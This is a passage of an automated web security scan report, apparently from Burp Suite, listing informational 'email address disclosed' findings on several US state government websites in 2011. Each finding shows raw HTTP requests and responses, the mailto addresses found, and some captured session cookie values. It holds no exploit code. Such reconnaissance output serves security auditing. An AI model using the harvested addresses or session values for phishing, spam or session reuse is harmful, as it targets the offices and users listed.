Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 39163
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:39 GMT

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
.ext-el-mask {
background-color: #ccc;
}

.ext-el-mask-msg {
border-color:#6593cf;
background-color:#c3daf9;
background-image:url(../images/d
...[SNIP]...

22.94. http://ohiodnr.com/controls/SolpartMenu/spmenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ohiodnr.com
Path:   /controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: ohiodnr.com
Proxy-Connection: keep-alive
Referer: http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=8J-lumc9zAEkAAAAOWVjOGQ0YzUtMWY2OS00OTgwLTlhNmMtNTM1YzVkYTBmYTUy0; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 67819
Content-Type: application/x-javascript
Last-Modified: Wed, 21 Mar 2007 00:00:38 GMT
Accept-Ranges: bytes
ETag: "097f8f44b6bc71:7e1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:28:24 GMT

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

22.95. http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ohiodnr.com
Path:   /watercraft/BuckeyeBoater/tabid/2200/Default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /watercraft/BuckeyeBoater/tabid/2200/Default.aspx HTTP/1.1
Host: ohiodnr.com
Proxy-Connection: keep-alive
Referer: http://oh.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=_J_1CGk9zAEkAAAANzk2MzBhODktOGRiOC00MmI0LTg4MTYtOTk0YzhiNGM2NGU30; expires=Fri, 08-Jul-2011 12:17:41 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Buckeye Boater Spring" /><meta id="MetaKeyw
...[SNIP]...
<a href="mailto:wcrenewal@dnr.state.oh.us">
...[SNIP]...
<a href="mailto:watercraft@dnr.state.oh.us?subject=Suggestions">
...[SNIP]...
<a href="mailto:unsubscribebb@dnr.state.oh.us?subject=Unsubscribe">
...[SNIP]...
<a href="mailto:watercraft@dnr.state.oh.us?subject=Remove%20Old%20Email">
...[SNIP]...

22.96. http://ohiodnr.com/watercraft/RegistrationandTitling/tabid/2774/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ohiodnr.com
Path:   /watercraft/RegistrationandTitling/tabid/2774/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /watercraft/RegistrationandTitling/tabid/2774/Default.aspx HTTP/1.1
Host: ohiodnr.com
Proxy-Connection: keep-alive
Referer: http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=8J-lumc9zAEkAAAAOWVjOGQ0YzUtMWY2OS00OTgwLTlhNmMtNTM1YzVkYTBmYTUy0; language=en-US; __utmz=237486942.1304126934.1.1.utmcsr=oh.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=237486942.1343737018.1304126934.1304126934.1304126934.1; __utmc=237486942; __utmb=237486942.1.10.1304126934

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:44:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37187

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Ohio Boat Registration and Titling informat
...[SNIP]...
<a href="mailto:watercraft@dnr.state.oh.us">
...[SNIP]...
<a href="mailto:watercraft@dnr.state.oh.us?subject=Did%20Not%20Receive%20Decals">watercraft@dnr.state.oh.us</a>
...[SNIP]...

22.97. http://phonebook.iowa.gov/agency.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phonebook.iowa.gov
Path:   /agency.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /agency.aspx HTTP/1.1
Host: phonebook.iowa.gov
Proxy-Connection: keep-alive
Referer: http://phonebook.iowa.gov/info.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:17:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 119830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<a href="mailto:iowa-webmaster@iowai.org">
...[SNIP]...

22.98. http://phonebook.iowa.gov/info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phonebook.iowa.gov
Path:   /info.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /info.aspx HTTP/1.1
Host: phonebook.iowa.gov
Proxy-Connection: keep-alive
Referer: http://ia.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:17:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<a href="mailto:iowa-webmaster@iowai.org">
...[SNIP]...

22.99. http://phonebook.iowa.gov/js/jq-cookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phonebook.iowa.gov
Path:   /js/jq-cookies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jq-cookies.js HTTP/1.1
Host: phonebook.iowa.gov
Proxy-Connection: keep-alive
Referer: http://phonebook.iowa.gov/info.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:15:07 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3361
Content-Type: application/x-javascript
Last-Modified: Mon, 09 Aug 2010 19:33:19 GMT
Accept-Ranges: bytes
ETag: "a565a1b8f937cb1:e8d"
X-Powered-By: ASP.NET

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie=function(name,value,options){if(typeof value!='undefined'){options=options||{};if(value===null){value='';options.expires=-1}var expires='';if(options.expires&&(typeof options.expir
...[SNIP]...

22.100. http://sc.gov/Style%20Library/scripts/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc.gov
Path:   /Style%20Library/scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Style%20Library/scripts/jquery.cookie.js HTTP/1.1
Host: sc.gov
Proxy-Connection: keep-alive
Referer: http://sc.gov/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAgencySite=855793418.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 4246
Content-Type: application/x-javascript
Last-Modified: Tue, 01 Jun 2010 15:34:15 GMT
ETag: "{47F443D0-05C0-4E94-9329-78B54E110488},2"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
ResourceTag: rt:47F443D0-05C0-4E94-9329-78B54E110488@00000000002
Exires: Fri, 15 Apr 2011 00:36:09 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
Date: Sat, 30 Apr 2011 00:36:09 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.101. http://serverapi.arcgisonline.com/jsapi/arcgis/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serverapi.arcgisonline.com
Path:   /jsapi/arcgis/

Issue detail

The following email address was disclosed in the response:

Request

GET /jsapi/arcgis/?v=2.1 HTTP/1.1
Host: serverapi.arcgisonline.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000,public
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:22:51 GMT
Expires: Sun, 29 Apr 2012 11:22:52 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Connection: keep-alive
Content-Length: 564058

/*
   Copyright (c) 2004-2010, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

...[SNIP]...
r additional information, contact:
Environmental Systems Research Institute, Inc.
Attn: Contracts and Legal Services Department
380 New York Street
Redlands, California, 92373
USA

email: contracts@esri.com
*/

(function(){var _1=window[(typeof (djConfig)!="undefined"&&djConfig.scopeMap&&djConfig.scopeMap[0][1])||"dojo"];var _2=window[(typeof (djConfig)!="undefined"&&djConfig.scopeMap&&djConfig.scope
...[SNIP]...

22.102. http://sos.ri.gov/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sos.ri.gov
Path:   /business/

Issue detail

The following email address was disclosed in the response:

Request

GET /business/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/business/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; __utmc=53040939

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:47 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 16169

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:corporations@sos.ri.gov">
...[SNIP]...
<a href="mailto:corporations@sos.ri.gov">
...[SNIP]...

22.103. http://sos.ri.gov/business/apostilles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sos.ri.gov
Path:   /business/apostilles/

Issue detail

The following email address was disclosed in the response:

Request

GET /business/apostilles/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
Referer: http://sos.ri.gov/business/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; __utmc=53040939; __utmz=235654147.1304124081.1.1.utmcsr=ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/business/; __utma=235654147.411503494.1304124081.1304124081.1304124081.1; __utmc=235654147; __utmb=235654147.1.10.1304124081

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:47 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 17402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:notaries@sos.ri.gov">
...[SNIP]...

22.104. http://sos.ri.gov/openmeetings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sos.ri.gov
Path:   /openmeetings/

Issue detail

The following email address was disclosed in the response:

Request

GET /openmeetings/ HTTP/1.1
Host: sos.ri.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235654147.1304124081.1.1.utmcsr=ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/business/; __utma=235654147.411503494.1304124081.1304124081.1304124081.1; __utmc=235654147; __utmb=235654147.1.10.1304124081;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:23 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:openmeetings@sos.ri.gov">
...[SNIP]...

22.105. http://stayconnected.hawaii.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stayconnected.hawaii.gov
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: stayconnected.hawaii.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 19:16:26 GMT
ETag: "74af-4a0bd874bd680"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29871
Date: Sat, 30 Apr 2011 22:18:42 GMT
X-Varnish: 952089020
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:governor.lingle@hawaii.gov">governor.lingle@hawaii.gov</a>
...[SNIP]...
<a href="mailto:ltgov@hawaii.gov">ltgov@hawaii.gov</a>
...[SNIP]...
<a href="mailto:dags@hawaii.gov">dags@hawaii.gov</a>
...[SNIP]...
<a href="mailto:hdoa.info@hawaii.gov">hdoa.info@hawaii.gov</a>
...[SNIP]...
<a href="mailto:hawaiiag@hawaii.gov">hawaiiag@hawaii.gov</a>
...[SNIP]...
<a href="emailto:HI.BudgetandFinance@hawaii.gov">HI.BudgetandFinance@hawaii.gov</a>
...[SNIP]...
<a href="mailto:director@dbedt.hawaii.gov">director@dbedt.hawaii.gov</a>
...[SNIP]...
<a href="mailto:dcca@dcca.hawaii.gov">dcca@dcca.hawaii.gov</a>
...[SNIP]...
<a href="mailto:webmaster@dod.state.hi.us">webmaster@dod.state.hi.us</a>
...[SNIP]...
<a href="mailto:webmail@doh.hawaii.gov">webmail@doh.hawaii.gov</a>
...[SNIP]...
<a href="mailto:dhs@dhs.hawaii.gov">dhs@dhs.hawaii.gov</a>
...[SNIP]...
<a href="mailto:dlnr@hawaii.gov">dlnr@hawaii.gov</a>
...[SNIP]...
<a href="mailto:tax.directors.office@hawaii.gov">tax.directors.office@hawaii.gov</a>
...[SNIP]...
<a href="mailto:dotpao@hawaii.gov">dotpao@hawaii.gov</a>
...[SNIP]...
<a href="mailto:webmaster@hawaii.gov" alt="Contact" title="Contact">
...[SNIP]...

22.106. http://tn.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tn.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:43 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 29239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="mailto:anti.spam@tn.gov" class="hide">anti.spam@tn.gov</a>
...[SNIP]...

22.107. http://tn.gov/apps/js/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tn.gov
Path:   /apps/js/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/controls.js HTTP/1.1
Host: tn.gov
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:55 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:21 GMT
ETag: "36c7f-8834-8d915640"
Accept-Ranges: bytes
Content-Length: 34868
Content-Type: application/javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22.108. http://tn.gov/apps/js/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tn.gov
Path:   /apps/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/dragdrop.js HTTP/1.1
Host: tn.gov
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:55 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:21 GMT
ETag: "3565f-7b75-8d915640"
Accept-Ranges: bytes
Content-Length: 31605
Content-Type: application/javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

22.109. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ContractsAdministration/index.cfm HTTP/1.1
Host: tomcat2.dot.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:28:42 GMT
Content-Type: text/html; charset=UTF-8
Server: JRun Web Server


                                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

   <title>GDOT-Office of Construction Bidding Administration</title>


...[SNIP]...
<a href="mailto:dhoge@dot.ga.gov">
...[SNIP]...

22.110. https://treas-secure.treas.state.mi.us/eservice_enu/19230/scripts/swecommon.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/19230/scripts/swecommon.js

Issue detail

The following email address was disclosed in the response:

Request

GET /eservice_enu/19230/scripts/swecommon.js HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: https://treas-secure.treas.state.mi.us/eservice_enu/start.swe?SWECmd=Start&SWEHo=treas-secure.treas.state.mi.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sn=BDkjKBekpE2aQW.txkaeXqJWDwtWzC4yVeCYeVfD9oE_

Response

HTTP/1.1 200 OK
Content-Length: 136687
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Dec 2010 22:18:41 GMT
Accept-Ranges: bytes
ETag: "cc9416b45c96cb1:b3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:31:52 GMT
Connection: close

//////////////////////////////////////////////////////////////////////////////
//
// Copyright (C) 1998, Siebel Systems, Inc., All rights reserved.
//
// FILE: swecommon.js
// $Revision: 1
...[SNIP]...
sition = -1;
   var format = /^[a-z][\w.]*@[\w\.]+\.[a-z]{2,3}/i

   if ( ! Email == "") {    

       if (! format.test(Email))
           {
               alert("Please enter your email address in the correct format. Ex. johndoe@hotmail.com");
           } else
        {

           Subject4()
        }
       }        
   else
       {
           Subject4()
       }
}


function Subject4() {
   var theForm;
   theForm = document.SWEForm1_0;
   var Subject = theForm.l_Abstra
...[SNIP]...
rmat is correct, otherwise display an error message
if (strEmail != "") {
if (! format.test(strEmail)) {
strMessage = "Please enter your email address in the correct format. Ex. johndoe@hotmail.com";
return(strMessage);
}
